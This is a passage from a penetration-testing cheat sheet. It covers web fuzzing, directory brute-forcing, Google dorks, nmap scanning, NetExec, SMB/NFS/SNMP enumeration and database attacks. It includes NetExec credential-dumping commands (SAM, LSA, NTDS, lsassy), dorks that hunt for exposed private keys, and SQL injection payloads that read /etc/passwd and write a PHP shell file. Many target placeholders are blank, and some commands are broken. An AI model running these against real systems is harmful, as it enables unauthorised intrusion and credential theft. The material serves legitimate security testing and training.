-X POST -H "Content-Type: application/json" -u "[https://somesite.com/someapi](https://somesite.com/someapi)" -d "{\"WFUZZ\": \"somevalue\"}" -w somewordlist.txt ``` Additional example, internal SSRF fuzzing: ``` wfuzz -t 30 -f wfuzz_results.txt --hc 404,405 -X GET -u "[https://somesite.com/someapi?url=127.0.0.1:WFUZZ](https://somesite.com/someapi?url=127.0.0.1:WFUZZ)" -w ports.txt wfuzz -t 30 -f wfuzz_results.txt --hc 404,405 -X GET -u "[https://somesite.com/someapi?url=WFUZZ:80](https://somesite.com/someapi?url=WFUZZ:80)" -w ips.txt ``` | Option | Description | | --- | --- | | -f | Store results in the output file | | -t | Specify the number of concurrent connections (10 default) | | -s | Specify time delay between requests (0 default) | | -u | Specify a URL for the request | | -w | Specify a wordlist file | | -X | Specify an HTTP method for the request, i.e., HEAD or FUZZ | | -b | Specify a cookie for the requests | | -d | Use post data | | -H | Use header | | --hc/--hl/--hw/--hh | Hide responses with the specified code/lines/words/chars | | --sc/--sl/--sw/--sh| Show responses with the specified code/lines/words/chars | | --ss/--hs| Show/hide responses with the specified regex within the content | ### Directory Fuzzing **[`^ back to top ^`](#overview)** **Don't forget that GNU/Linux OS has a case sensitive file system, so make sure to use the right wordlists.** If you don't get any hits while brute forcing directories, try to brute force files by specifying file extensions. The below tools support recursive directory and file search. Also, they might take a long time to finish depending on the used settings and wordlist. #### dirb **[`^ back to top ^`](#overview)** ``` dirb [http://target.com](http://target.com) /path/to/wordlist ``` ``` dirb [http://target.com](http://target.com) /path/to/wordlist -X .sh,.txt,.htm,.php,.cgi,.html,.pl,.bak,.old ``` #### DirBuster **[`^ back to top ^`](#overview)** All DirBuster's wordlists are located at `/usr/share/dirbuster/wordlists/` directory. #### Dirsearch **[`^ back to top ^`](#overview)** Let's search the directories with dirsearch. ``` dirsearch -u http://:port/ --exclude-status 403,404,400,401 -o dir ``` Let's search with file extension: ``` dirsearch -u target.com -e sh,txt,htm,php,cgi,html,pl,bak,old ``` ``` dirsearch -u target.com -e sh,txt,htm,php,cgi,html,pl,bak,old -w path/to/wordlist ``` ``` dirsearch -u [https://target.com](https://target.com) -e . ``` #### feroxbuster **[`^ back to top ^`](#overview)** Brute force directories on a web server: ``` cat subdomains_live_long.txt | feroxbuster --stdin -k -n --auto-bail --random-agent -t 50 -T 3 --json -o feroxbuster_results.txt -s 200,301,302,401,403 -w raft-small-directories-lowercase.txt ``` This tool is way faster than [DirBuster](#dirbuster). Filter out directories from the results: ``` jq -r 'select(.status | tostring | test("^2")).url' feroxbuster_results.json | sort -uf | tee -a directories_2xx.txt jq -r 'select(.status | tostring | test("^2|^4")).url' feroxbuster_results.json | sort -uf | tee -a directories_2xx_4xx.txt jq -r 'select(.status | tostring | test("^3")).url' feroxbuster_results.json | sort -uf | tee -a directories_3xx.txt jq -r 'select(.status | tostring | test("^401$")).url' feroxbuster_results.json | sort -uf | tee -a directories_401.txt jq -r 'select(.status | tostring | test("^403$")).url' feroxbuster_results.json | sort -uf | tee -a directories_403.txt ``` | Option | Description | | --- | --- | | -u | The target URL (required, unless --stdin \| --resume-from is used) | | --stdin | Read URL(s) from STDIN | | -a/-A | Sets the User-Agent (default: feroxbuster\/x.x.x) \/ Use a random User-Agent | | -x | File extension(s) to search for (ex: -x php -x pdf,js) | | -m | Which HTTP request method(s) should be sent (default: GET) | | --data | Request's body; can read data from a file if input starts with an \@(ex: \@post.bin) | | -H | Specify HTTP headers to be used in each request (ex: -H header:val -H 'stuff:things') | | -b | Specify HTTP cookies to be used in each request (ex: -b stuff=things) | | -Q | Request's URL query parameters (ex: -Q token=stuff -Q secret=key) | | -f | Append \/ to each request's URL | | -s | Status Codes to include (allow list) (default: 200,204,301,302,307,308,401,403,405) | | -T | Number of seconds before a client's request times out (default: 7) | | -k | Disables TLS certificate validation for the client | | -t | Number of concurrent threads (default: 50) | | -n | Do not scan recursively | | -w | Path to the wordlist | | --auto-bail | Automatically stop scanning when an excessive amount of errors are encountered | | -B | Automatically request likely backup extensions for "found" URLs (default: ~, .bak, .bak2, .old, .1) | | -q | Hide progress bars and banner (good for tmux windows w/ notifications) | | -o | Output file to write results to (use w/ --json for JSON entries) | #### ffuf **[`^ back to top ^`](#overview)** Directory fuzzing: ``` ffuf -u http:///FUZZ -w /usr/share/dirb/wordlists/common.txt -mc 200,204,301,302,307 ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-directories.txt -u "http:///FUZZ" -c ``` Subdomain search with ffuf: ``` ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt -u "" -H "HOST: FUZZ." -c -fs 169 ``` #### gobuster **[`^ back to top ^`](#overview)** ``` gobuster -u [https://target.com](https://target.com) -w /usr/share/wordlists/dirb/big.txt ``` Let's search the directories with gobuster. In the parameters we specify the number of threads 128 (`-t`), URL (`-u`), dictionary (`-w`) and extensions we are interested in (`-x`). ``` gobuster dir -t 128 -k -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html,sh,cgi gobuster dir -t 50 -k -u http://:49663 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -s '200,301' --no-error ``` Let's search the subdomains with gobuster: ``` gobuster vhost -u -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -k gobuster vhost -u -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt --append-domain -t 20 ``` If we see DNS server in the ports, so let's try to crawl domains: ``` gobuster dns -d -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -r :53 ``` ### Google Dorks **[`^ back to top ^`](#overview)** Google Dork databases: * [exploit-db.com/google-hacking-database](https://www.exploit-db.com/google-hacking-database) * [cxsecurity.com/dorks](https://cxsecurity.com/dorks) * [pentest-tools.com/information-gathering/google-hacking](https://pentest-tools.com/information-gathering/google-hacking) * [opsdisk/pagodo/blob/master/dorks/all_google_dorks.txt](https://github.com/opsdisk/pagodo/blob/master/dorks/all_google_dorks.txt) Check the list of `/.well-known/` files [here](https://www.iana.org/assignments/well-known-uris/well-known-uris.xhtml). Google Dorking will not show directories nor files that are disallowed in `robots.txt`, to check for such directories and files use [httpx](#httpx). Append `site:www.somedomain.com` to limit your scope to a specified subdomain. Append `site:*.somedomain.com` to limit your scope to all subdomains. Append `site:*.somedomain.com -www` to exclude `www` subdomain from the results. Simple Google Dorks: ``` inurl:/robots.txt intext:disallow ext:txt inurl:/.well-known/security.txt ext:txt inurl:/info.php intext:"php version" ext:php intitle:"index of /" intext:"parent directory" intitle:"index of /.git" intext:"parent directory" inurl:/gitweb.cgi intitle:"Dashboard [Jenkins]" (intext:"mysql database" AND intext:db_password) ext:txt intext:-----BEGIN PGP PRIVATE KEY BLOCK----- (ext:pem OR ext:key OR ext:txt) ``` ### Chad **[`^ back to top ^`](#overview)** Find and download files using a Google Dork: ``` mkdir chad_downloads chad -nsos -o chad_downloads_results.json -dir chad_downloads -tr 200 -q "ext:txt OR ext:json OR ext:yml OR ext:pdf OR ext:doc OR ext:docx OR ext:xls OR ext:xlsx OR ext:zip OR ext:tar OR ext:rar OR ext:gzip OR ext:7z" -s *.somedomain.com ``` Extract authors (and more) from the files: ``` apt -y install libimage-exiftool-perl exiftool -S chad_downloads | grep -Po '(?<=Author\:\ ).+' | sort -uf | tee -a people.txt ``` Find directory listings using a Google Dork: ``` chad -nsos chad_directory_listings_results.json -tr 200 -q 'intitle:"index of /" intext:"parent directory"' -s *.somedomain.com ``` More about project at [ivan-sincek/chad](https://github.com/ivan-sincek/chad). ### PhoneInfoga **[`^ back to top ^`](#overview)** Download the latest version from [GitHub](https://github.com/sundowndev/phoneinfoga/releases) and check how to [install](#0-install-tools-and-setup) the tool. Get a phone number information: ``` phoneinfoga scan -n +1111111111 ``` Get a phone number information using the web UI: <_BLOCK_101/> Navigate to `http://localhost:5000` with your preferred web browser. ### git-dumper **[`^ back to top ^`](#overview)** Try to reconstruct a GitHub repository, i.e., get the source code, based on the commit history from a public `/.git` directory: ``` # git-dumper

git-dumper [https://somesite.com/.git](https://somesite.com/.git) git_dumper_results ``` This tool might not be able to reconstruct the whole repository every time, but it could still reveal some sensitive information. Some additional `git` commands to try on the cloned `/.git` directory: ``` git status git log git checkout -- . git restore . ``` Use [Google Dorking](#google-dorks) and [Chad](#chad) to find more targets. ### TruffleHog **[`^ back to top ^`](#overview)** Installation: ``` git clone [https://github.com/trufflesecurity/trufflehog](https://github.com/trufflesecurity/trufflehog) && cd trufflehog go install ``` Search for sensitive information inside a single repository or the whole organization on GitHub: ``` trufflehog git [https://github.com/trufflesecurity/test_keys](https://github.com/trufflesecurity/test_keys) --only-verified --json trufflehog github --org=trufflesecurity --only-verified --json ``` Search for sensitive information inside files and directories: ``` trufflehog filesystem somefile_1.txt somefile_2.txt somedir1 somedir2 ``` ### katana **[`^ back to top ^`](#overview)** Installation: ``` go install -v [github.com/projectdiscovery/katana/cmd/katana@latest](https://github.com/projectdiscovery/katana/cmd/katana@latest) ``` Crawl a website: ``` katana -timeout 3 -retry 1 -c 30 -o katana_results.txt -ps -jc -iqp -d 1 -u [https://somesite.com/home](https://somesite.com/home) katana -timeout 3 -retry 1 -c 30 -o katana_results.txt -ps -jc -iqp -d 1 -u subdomains_live_long_2xx.txt ``` ### Scrapy Scraper **[`^ back to top ^`](#overview)** Crawl a website, download, and beautify minified JavaScript files: ``` scrapy-scraper -cr 30 -a random -o scrapy_scraper_results.txt -p -r 1 -dir somedir -u [https://somesite.com/home](https://somesite.com/home) scrapy-scraper -cr 30 -a random -o scrapy_scraper_results.txt -p -r 1 -dir somedir -u subdomains_live_long_2xx.txt ``` In case you get no results while using Playwright's headless browser, try updating it: ``` pip3 install --upgrade playwright playwright install chromium ``` Scrape the JavaScript files for sensitive information using [TruffleHog](#trufflehog). ### snallygaster **[`^ back to top ^`](#overview)** Download the latest version from [GitHub](https://github.com/hannob/snallygaster/releases). See how to [install](#0-install-tools-and-setup) the tool. Search a web server for sensitive files: ``` snallygaster --nowww somesite.com | tee snallygaster_results.txt for subdomain in $(cat subdomains_live_short_http.txt); do snallygaster --nohttps --nowww "${subdomain}"; done | tee snallygaster_http_results.txt for subdomain in $(cat subdomains_live_short_https.txt); do snallygaster --nohttp --nowww "${subdomain}"; done | tee snallygaster_https_results.txt ``` ### IIS Tilde Short name Scanning **[`^ back to top ^`](#overview)** Download: ``` git clone [https://github.com/irsdl/IIS-ShortName-Scanner](https://github.com/irsdl/IIS-ShortName-Scanner) && cd IIS-ShortName-Scanner/release ``` Search an IIS server for files and directories: ``` java -jar iis_shortname_scanner.jar 2 30 [https://somesite.com](https://somesite.com) ``` ### WhatWeb **[`^ back to top ^`](#overview)** Identify a website: ``` whatweb -v somesite.com ``` ### Parsero **[`^ back to top ^`](#overview)** Test all `robots.txt` entries: ``` parsero -sb -u somesite.com ``` ### EyeWitness **[`^ back to top ^`](#overview)** Grab screenshots from websites: ``` eyewitness --no-prompt --no-dns --threads 5 --timeout 3 -d eyewitness_results -f subdomains_live_long.txt ``` To check the screenshots, navigate to `eyewitness_results/screens` directory. ### Wordlists **[`^ back to top ^`](#overview)** You can find `rockyou.txt` inside `/usr/share/wordlists/` directory or inside [SecLists](https://github.com/danielmiessler/SecLists) – a useful collection of multiple types of wordlists for security assessments. Install SecLists (the collection will be stored at `/usr/share/seclists/` directory): ``` apt update && apt install seclists ``` Another popular wordlist collections: * [ayoubfathi/leaky-paths](https://github.com/ayoubfathi/leaky-paths) * [xmendez/wfuzz](https://github.com/xmendez/wfuzz) * [assetnote/commonspeak2-wordlists](https://github.com/assetnote/commonspeak2-wordlists) * [weakpass.com/wordlist](https://weakpass.com/wordlist) * [packetstormsecurity.com/Crackers/wordlists](https://packetstormsecurity.com/Crackers/wordlists) ## 2. Scanning/Enumeration **[`^ back to top ^`](#overview)** ### 2.1 Useful Websites **[`^ back to top ^`](#overview)** * [ipaddressguide.com/cidr](https://www.ipaddressguide.com/cidr) – CIDR to IP range conversion. * [account.arin.net/public/cidrCalculator](https://account.arin.net/public/cidrCalculator) – ARIN CIDR calculator. * [calculator.net/ip-subnet-calculator.html](https://www.calculator.net/ip-subnet-calculator.html) – subnet mask calculator. * [subnet-calculator.com/cidr.php](http://www.subnet-calculator.com/cidr.php) – IP subnet and CIDR calculator. * [speedguide.net/ports.php](https://www.speedguide.net/ports.php) – TCP/UDP port database. * [securityheaders.com](https://securityheaders.com) – HTTP security headers check. * [csp-evaluator.withgoogle.com](https://csp-evaluator.withgoogle.com) – Content Security Policy evaluator. * [mxtoolbox.com/blacklists.aspx](https://mxtoolbox.com/blacklists.aspx) – check IP/domain against blacklists. ### masscan **[`^ back to top ^`](#overview)** Scan all TCP and UDP ports from interface `tun0` at 1000 packets per second. ``` masscan -e tun0 -p1-65535,U:1-65535 --rate=1000 ``` ### rustscan **[`^ back to top ^`](#overview)** Fast scan all ports: ``` rustscan --ulimit=5000 --range=1-65535 -a -- -A -sC ``` ### Nmap **[`^ back to top ^`](#overview)** Ping sweep, map live hosts: ``` nmap -sn -n 192.168.8.0/24 | grep for | cut -d" " -f5 nmap -sn -oG nmap_ping_sweep_results.txt 192.168.8.0/24 nmap -sn -oG nmap_ping_sweep_results.txt -iL cidrs.txt ``` Extract live hosts from the results: ``` grep -Po '(?<=Host\:\ )[^\s]+' nmap_ping_sweep_results.txt | sort -uf | tee -a ips_live.txt ``` Quick scan: ``` nmap -T4 -F 192.168.8.0/24 nmap -sV -T4 -O -F --version-light 192.168.8.0/24 ``` TCP scan, all ports: ``` nmap -nv -sS -sV -sC -Pn -oN nmap_tcp_results.txt -p- 192.168.8.0/24 nmap -nv -sS -sV -sC -Pn -oN nmap_tcp_results.txt -p- -iL cidrs.txt ``` Automate TCP scan: ``` mkdir nmap_tcp_results for ip in $(cat ips_live.txt); do nmap -nv -sS -sV -sC -Pn -oN "nmap_tcp_results/nmap_tcp_results_${ip//./_}.txt" -p- "${ip}"; done ``` Stealth scan: ``` nmap -sS $ip ``` Only open ports and banner grab: ``` nmap -n -Pn -sS $ip --open -sV ``` Stealth scan using FIN scan: ``` nmap -sF $ip ``` UDP scan, only important ports: ``` nmap -nv -sU -sV -sC -Pn -oN nmap_udp_results.txt -p 53,67,68,69,88,123,135,137,138,139,161,162,389,445,500,514,631,1900,4500 192.168.8.0/24 nmap -nv -sU -sV -sC -Pn -oN nmap_udp_results.txt -p 53,67,68,69,88,123,135,137,138,139,161,162,389,445,500,514,631,1900,4500 -iL cidrs.txt ``` Automate UDP scan: ``` mkdir nmap_udp_results for ip in $(cat ips_live.txt); do nmap -nv -sU -sV -sC -Pn -oN "nmap_udp_results/nmap_udp_results_${ip//./_}.txt" -p 53,67,68,69,88,123,135,137,138,139,161,162,389,445,500,514,631,1900,4500 "${subdomain}"; done ``` Slow scan all ports: ``` nmap --privileged -sV -sC -sS -p- -oN nmap $ip ``` To get more information about the services that are running on the ports, let's run an nmap scan with the `-A` option. ``` nmap -A -sV -sC $ip -p80,135,139,445 ``` Without Ping scan, no dns resolution, show only open ports all and test All TCP Ports: ``` nmap -n -Pn -sS -A $ip --open -p- ``` Nmap verbose scan, runs syn stealth, `T4` timing, OS and service version info, traceroute and scripts against services: ``` nmap –v –sS –A –T4 $ip ``` OS fingerprint scan: ``` nmap -O $ip ``` Output to a file: ``` nmap -oN nameFile -p 1-65535 -sV -sS -A -T4 $ip nmap -oA nameFile -p 1-65535 -sV -sS -A -T4 192.168.8.0/24 ``` | Option | Description | | --- | --- | | -sn | Ping scan – disable port scan | | -Pn | Treat all hosts as online -- skip host discovery | | -n/-R | Never do DNS resolution/Always resolve (default: sometimes) | | -sS/sT/sA | TCP SYN/Connect()/ACK | | -sU | UDP scan | | -p/-p- | Only scan specified ports/Scan all ports | | --top-ports | Scan most common ports | | -sV | Probe open ports to determine service/version info | | -O | Enable OS detection | | -sC | Same as --script=default | | --script | Script scan (takes time to finish | | --script-args | Provide arguments to scripts | | --script-help | Show help about scripts | | -oN/-oX/-oG | Output scan in normal, XML, and Grepable format | | -v | Increase verbosity level (use -vv or more for greater effect) | | --reason | Display the reason a port is in a particular state | | -A | Enable OS detection, version detection, script scanning, and traceroute | NSE examples: ``` nmap -nv --script='mysql-brute' --script-args='userdb="users.txt", passdb="rockyou.txt"' 192.168.8.5 -p 3306 nmap -nv --script='dns-brute' --script-args='dns-brute.domain="somedomain.com", dns-brute.hostlist="subdomains-top1mil.txt"' nmap -nv --script='ssl-heartbleed' -iL cidrs.txt ``` ### NetExec **[`^ back to top ^`](#overview)** ``` apt install pipx git pipx ensurepath pipx install git+https://github.com/Pennyw0rth/NetExec ``` Installation via Poetry: ``` apt install -y libssl-dev libffi-dev python-dev-is-python3 build-essential git clone https://github.com/Pennyw0rth/NetExec cd NetExec poetry install poetry run NetExec ``` Modules: ``` netexec ldap -L netexec mysql -L netexec smb -L netexec ssh -L netexec winrm -L ``` Common commands: ``` netexec smb -u '' -p '' --shares netexec smb -u '' -p '' --shares -M spider_plus netexec smb -u '' -p '' --shares -M spider_plus -o READ_ONLY=false netexec smb -u '' -p '' --shares -M spider_plus -o DOWNLOAD_FLAG=true netexec smb -u '' -p '' --shares -M spider_plus -o DOWNLOAD_FLAG=true MAX_FILE_SIZE=99999999 netexec smb -u '' -p '' --share --get-file netexec smb -u 'guest' -p '' --shares --rid-brute netexec smb -u 'guest' -p '' --shares --rid-brute 100000 netexec smb -u 'guest' -p '' --shares --rid-brute | grep 'SidTypeUser' | awk '{print $6}' netexec smb -u 'guest' -p '' --shares --rid-brute | grep 'SidTypeUser' | awk '{print $6}' | awk -F '\\' '{print $2}' netexec smb -u '' --use-kcache --users netexec smb -u '' --use-kcache --sam netexec smb -u '' -p '' --shares netexec smb -u '' -p '' --shares --dir netexec smb -u '' -p '' --shares --dir "FOLDER" netexec smb -u '' -p '' --sam netexec smb -u '' -p '' --lsa netexec smb -u '' -p '' --dpapi netexec smb -u '' -p '' --local-auth --sam netexec smb -u '' -p '' --local-auth --lsa netexec smb -u '' -p '' --local-auth --dpapi netexec smb -u '' -p '' -M enum_av netexec smb -u '' -p '' -M wcc netexec smb -u '' -p '' -M snipped netexec smb -u '' -p '' -M lsassy netexec smb -u '' -p '' -M backup_operator netexec smb -u '' -p '' -M web_delivery -o URL=http:/// netexec smb -u '' -p '' -M gpp_autologin netexec smb -u '' -p '' -M gpp_password netexec smb -u '' -p '' -M powershell_history netexec smb -u '' -p '' -M coerce_plus -o LISTENER= netexec smb -u '' -p '' --ntds netexec smb -u '' -H '' --ntds netexec smb -u '' -p '' --ntds --user netexec smb -u '' -H '' --ntds --user netexec smb -u '' -H '' -x "whoami" netexec smb /PATH/TO/FILE/ --gen-relay-list netexec ldap -u '' -p '' -M -user-desc netexec ldap -u '' -p '' -M get-desc-users netexec ldap -u '' -p '' -M ldap-checker netexec ldap -u '' -p '' -M veeam netexec ldap -u '' -p '' -M maq netexec ldap -u '' -p '' -M adcs netexec ldap -u '' -p '' -M zerologon netexec ldap -u '' -p '' -M petitpotam netexec ldap -u '' -p '' -M nopac netexec ldap -u '' -p '' --use-kcache -M whoami netexec ldap -u '' -p '' --kerberoasting hashes.kerberoasting netexec ldap -u '' -p '' --asreproast hashes.asreproast netexec ldap -u '' -p '' --gmsa netexec ldap -u '' -p '' --gmsa -k netexec ldap -u '' -p '' --gmsa-convert-id netexec ldap -u '' -p '' --gmsa-decrypt-lsa netexec ldap -u '' -p '' --find-delegation netexec ldap -u '' -p '' -M get-network -o ALL=true netexec ldap -u '' -p '' --bloodhound -ns -c All netexec ldap -u '' --use-kcache --bloodhound --dns-tcp --dns-server -c All netexec winrm /24 -u '' -p '' -d . netexec winrm -u /t -p '' -d '' netexec winrm -u /PATH/TO/FILE/ -p /PATH/TO/WORDLIST/ netexec winrm -u /PATH/TO/FILE/ -p /PATH/TO/WORDLIST/ --ignore-pw-decoding netexec -u /PATH/TO/FILE/ -p /PATH/TO/WORDLIST/ --no-bruteforce --continue-on-success netexec -u /PATH/TO/FILE/ -p /PATH/TO/WORDLIST/ --shares netexec -u /PATH/TO/FILE/ -p /PATH/TO/WORDLIST/ --shares --continue netexec -u /PATH/TO/FILE/ -p /PATH/TO/WORDLIST/ --pass-pol netexec -u /PATH/TO/FILE/ -p /PATH/TO/WORDLIST/ --lusers netexec -u /PATH/TO/FILE/ -p /PATH/TO/WORDLIST/ --sam netexec -u /PATH/TO/FILE/ -p /PATH/TO/WORDLIST/ --wdigest enable netexec -u /PATH/TO/FILE/ -p /PATH/TO/WORDLIST/ -x 'quser' netexec -u /PATH/TO/FILE/ -p /PATH/TO/WORDLIST/ -x 'net user Administrator /domain' --exec-method smbexec ``` ### NFS **[`^ back to top ^`](#overview)** Check which directories are exported via NFS. ``` apt install nfs-common /sbin/showmount --exports ``` Mount to the local folder: ``` mount -t nfs :/mnt/backups /mnt/ ``` ### Samba **[`^ back to top ^`](#overview)** Connect as anonymous: ``` smbclient ///anonymous ``` Get shares that access for user: ``` smbmap -H -u "USERNAME" -p "PASSWORD" ``` Connect as user: ``` smbclient ///SHARE_NAME -U USERNAME Password for [WORKGROUP\USERNAME]: ``` Download from samba folder: ``` smbget -R smb:///anonymous ``` ### SNMP **[`^ back to top ^`](#overview)** Walking MIB's via `snmpwalk`: ``` snmpwalk -c COMMUNITY -v VERSION target_ip snmpwalk -c public -v1 snmpwalk -c public -v2c ``` Specific MIB node: ``` snmpwalk -c community -v version Target IP MIB Node # Example: USER ACCOUNTS = 1.3.6.1.4.1.77.1.2.25 snmpwalk -c public -v1 192.168.25.77 1.3.6.1.4.1.77.1.2.25 ``` snmp-check: ``` snmp-check -t target_IP | snmp-check -t TARGET -c COMMUNITY snmp-check -t 172.20.10.5 snmp-check -t 172.20.10.5 -c public Nmap SNMPv3 enumeration: ```shell nmap -sV -p 161 --script=snmp-info 172.20.10.0/24 ``` ### testssl.sh **[`^ back to top ^`](#overview)** Installation: ``` apt update && apt -y install testssl.sh ``` Test an SSL/TLS certificate (e.g., SSL/TLS ciphers, protocols, etc.): ``` testssl --openssl /usr/bin/openssl -oH testssl_results.html somesite.com ``` You can also use `testssl.sh` to exploit SSL/TLS vulnerabilities. ### OpenSSL **[`^ back to top ^`](#overview)** Test a web server for Heartbleed vulnerability: ``` for subdomain in $(cat subdomains_live.txt); do res=$(echo "Q" | openssl s_client -connect "${subdomain}:443" 2>&1 | grep 'server extension "heartbeat" (id=15)'); if [[ ! -z $res ]]; then echo "${subdomain}"; fi; done | tee openssl_heartbleed_results.txt for subdomain in $(cat subdomains_live_short_https.txt); do res=$(echo "Q" | openssl s_client -connect "${subdomain}" 2>&1 | grep 'server extension "heartbeat" (id=15)'); if [[ ! -z $res ]]; then echo "${subdomain}"; fi; done | tee openssl_heartbleed_results.txt ``` ### keytool **[`^ back to top ^`](#overview)** Grab SSL/TLS certificate: ``` keytool -printcert -rfc -sslserver somesite.com > keytool_results.txt openssl x509 -noout -text -in keytool_results.txt ``` Use [uncover](#uncover) with Shodan and Censys SSL/TLS Dorks to find more in-scope subdomains. ### uncover **[`^ back to top ^`](#overview)** Installation: ``` go install -v [github.com/projectdiscovery/uncover/cmd/uncover@latest](https://github.com/projectdiscovery/uncover/cmd/uncover@latest) ``` Set your API keys in `/root/.config/uncover/provider-config.yaml` as following: ``` shodan: - SHODAN_API_KEY censys: - CENSYS_API_ID:CENSYS_API_SECRET ``` Gather IPs based on the SSL/TLS certificate subject common name (CN): ``` uncover -json -o uncover_cert_shodan_results.json -l 100 -e shodan -q 'ssl.cert.subject.CN:"*.somedomain.com"' uncover -json -o uncover_cert_censys_results.json -l 100 -e censys -q 'cert.parsed.subject.common_name:"*.somedomain.com"' ``` ### Databases **[`^ back to top ^`](#overview)** #### MYSQL **[`^ back to top ^`](#overview)** **Try remote default root access:** ``` mysql -h target_ip -u root -p ``` **Login:** ``` mysql -u user -h localhost -D database -p ``` **Skip password:** ``` mysql -u user -h localhost -D database --password='passwd' ``` **Execute SQL Command:** ``` mysql -u user -h localhost -D database --password='passwd' -e 'command' ``` **Enumeration commands for privileges:** ``` SHOW GRANTS FOR CURRENT_USER(); SHOW GRANTS FOR 'root'@'localhost'; SELECT * FROM mysql.user; # All Databases SHOW DATABASES; # Use Database USE databasename; # All Tables SHOW TABLES; # All data from table SELECT * FROM tablename; # For better output, add `\G` instead of `;` at the end. # All columns/infos from table describe tablename; ``` **Queries:** ``` # Get Version version() @@version # Current User user() # Current DB database() # User privileges SELECT super_priv FROM mysql.user UNION SELECT 1, super_priv, 3, 4 FROM mysql.user-- - UNION SELECT 1, super_priv, 3, 4 FROM mysql.user WHERE user="root"-- - UNION SELECT 1, grantee, privilege_type, is_grantable FROM information_schema.user_privileges-- - # All Databases group_concat(Schema_NAME,"\r\n") FROM Information_Schema.SCHEMATA # All tables from DB group_concat(TABLE_NAME) FROM Information_Schema.TABLES WHERE TABLE_SCHEMA = 'db_name' UNION SELECT table_name,NULL,FROM information_schema.tables # All columns for all tabels in database group_concat(COLUMN_NAME) FROM Information_Schema.COLUMNS WHERE TABLE_SCHEMA = 'db_name' # Get table and column name at once group_concat(TABLE_NAME,' : ',COLUMN_NAME,'\r\n') FROM Information_Schema.COLUMNS WHERE TABLE_SCHEMA = 'db' # All columns for one table group_concat(COLUMN_NAME) FROM Information_Schema.COLUMNS WHERE TABLE_SCHEMA = 'db_name' AND TABLE_NAME = 'table_name' # Show Input from table group_concat(role,' : ',name,' : ',email,' : ',password,'\r\n') from users # List Password Hashes SELECT host, user, password FROM mysql.user; ``` **Read files:** ``` union select 1,2,3,LOAD_FILE('/etc/passwd')-- - Union Select TO_base64(LOAD_FILE("/var/www/html/index.php"))-- - ``` **Writing files** (checking the `secure_file_priv` value, empty means we can read/write files): ``` UNION SELECT 1, variable_name, variable_value, 4 FROM information_schema.global_variables where variable_name="secure_file_priv"-- - SELECT * from users INTO OUTFILE '/tmp/credentials'; select 'file written successfully!' into outfile '/var/www/html/proof.txt' ``` **PHP code:** ``` union select "",'', "", "" into outfile '/var/www/html/shell.php'-- - ``` **Attack types:** ``` # Union Select ## Detect number of columns using `order by` ' order by 1-- - ## Detect number of columns using Union injection: cn' UNION select 1,2,3-- - union select 1,2,3,version()-- - # Error Based ## MariaDB payloads and extractvalue(1,concat(0x7e,version()))-- - AND (extractvalue(1,concat(0x7e,version()))) and updatexml(1,concat(0x0a,version()),null)-- - and (SELECT*FROM(SELECT(name_const(version(),1)),name_const(version(),1))a)-- - ## Get pieces from output: and extractvalue(0,concat(0,(select (select mid(,1,99)) from . limit 0,1))) # Or and extractvalue(0,concat(0,substring((select from . limit 0,1) from 1))) IudGPHd9pEKiee9MkJ7ggPD89q3Yn… # We got the first 32 chars from the output,because the function `extractvalue()` only return this length of a string! echo -n 'IudGPHd9pEKiee9MkJ7ggPD89q3Y' | wc -c # Now change the index to 1+29 = 30 (29 because the … is 3 and 32-3=29) and extractvalue(0x7e,concat(0x7e,substring((select from . limit 0,1) from 30))) # "ndctnPeRQOmS2PQ7QIrbJEomFVG6" and the next index is 1+29+29 = 59 # When you see less then 32 chars, the output is finised and you can set limit 0,1 to limit 1,1 and so on limit 2,1 # Blind SQLi ## 5 sec to retrieve the response: and sleep(5)# # length(database())=X count up until the output and length(database())=4# ``` #### MSSQL **[`^ back to top ^`](#overview)** Information gathering: ``` nmap -p 1433 --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER $ip ``` Connect to MSSQL database and check dir content: ``` impacket-mssqlclient -p 1433 -dc-ip DOMAIN/Operator:operator@ -windows-auth SQL (MANAGER\Operator guest@master)> xp_dirtree "C:\inetpub\wwwroot\",0,1; ``` Get version: ``` -q "SELECT @@Version" ``` Get current database: ``` -q "SELECT DB_NAME() AS [Current Database]" ``` Get all database names: ``` -q "SELECT name FROM sys.databases" -q "Select name from sysdatabases" -q "SELECT name FROM master.dbo.sysdatabases" ``` Get all table names: ``` -q "SELECT table_name from core_app.INFORMATION_SCHEMA.TABLES" ``` Get all content from table: ``` -q "SELECT * from [core_app].[dbo].tbl_users" ``` #### PostgreSQL **[`^ back to top ^`](#overview)** ``` psql "postgresql://$DB_USER:$DB_PWD@$DB_SERVER/$DB_NAME" psql -U postgres -W -h localhost -d cozyhosting psql "postgresql://postgres:PASSWORD@localhost:5432/cozyhosting" psql -U postgres -W -h localhost -d cozyhosting Password: \list List of databases Name | Owner | Encoding | Collate | Ctype | Access privileges -------------+----------+----------+-------------+-------------+----------------------- cozyhosting | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8 | postgres | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8 | template0 | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8 | =c/postgres + | | | | | postgres=CTc/postgres template1 | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8 | =c/postgres + | | | | | postgres=CTc/postgres (4 rows) \c cozyhosting Password: You are now connected to database "cozyhosting" as user "postgres". \d List of relations Schema | Name | Type | Owner --------+--------------+----------+---------- public | hosts | table | postgres public | hosts_id_seq | sequence | postgres public | users | table | postgres (3 rows) SELECT * FROM users; name | password | role -----------+--------------------------------------------------------------+------- kanderson | $2a$10$E/Vcd9ecflmPudWeLSEIv.cvK6QjxjWlWXpij1NVNV3Mm6eH58zim | User admin | $2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm | Admin (2 rows) ``` #### sqlite **[`^ back to top ^`](#overview)** Connect to `.sqlite` database and dump data: ``` sqlite3 